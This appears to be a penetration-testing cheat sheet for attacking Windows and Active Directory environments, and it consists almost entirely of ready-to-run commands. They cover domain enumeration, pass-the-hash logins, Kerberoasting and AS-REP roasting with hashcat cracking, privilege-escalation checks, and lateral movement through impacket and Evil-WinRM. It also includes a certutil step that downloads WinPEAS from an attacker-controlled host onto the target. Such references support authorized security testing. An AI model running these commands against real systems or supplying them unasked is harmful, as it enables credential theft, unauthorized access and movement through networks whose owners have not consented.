Skip to content

Windows & Active Directory

Enumeration

# Current user info
whoami /all

# Local users and groups
net user
net localgroup administrators

# Domain info
net user /domain
net group "Domain Admins" /domain
nltest /domain_trusts

# BloodHound ingestor (from Linux)
bloodhound-python -u <user> -p <pass> -d <domain> -ns <dc_ip> -c All

# Enum4linux
enum4linux -a <target>

# CrackMapExec — SMB enumeration
crackmapexec smb <target> -u <user> -p <pass> --shares
crackmapexec smb <target> -u <user> -p <pass> --users
crackmapexec smb <target> -u <user> -p <pass> --groups

Pass the Hash

# CrackMapExec
crackmapexec smb <target> -u administrator -H <ntlm_hash>

# Evil-WinRM
evil-winrm -i <target> -u administrator -H <ntlm_hash>

# Impacket psexec
impacket-psexec administrator@<target> -hashes :<ntlm_hash>

Kerberoasting

# Get SPNs and request tickets
impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc_ip> -request -outputfile hashes.txt

# Crack with hashcat (mode 13100)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

# Find accounts with no pre-auth
impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep_hashes.txt

# Crack with hashcat (mode 18200)
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

Privilege Escalation

# Check for unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# AlwaysInstallElevated check
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Scheduled tasks
schtasks /query /fo LIST /v | findstr /i "task name\|run as\|status"

# WinPEAS (from Kali, serve via HTTP, fetch on target)
python3 -m http.server 8080
# On target:
# certutil -urlcache -split -f http://<kali_ip>:8080/winpeas.exe winpeas.exe

Lateral Movement

# WMI exec
impacket-wmiexec <domain>/<user>:<pass>@<target>

# SMBexec
impacket-smbexec <domain>/<user>:<pass>@<target>

# Evil-WinRM (WinRM / port 5985)
evil-winrm -i <target> -u <user> -p <pass>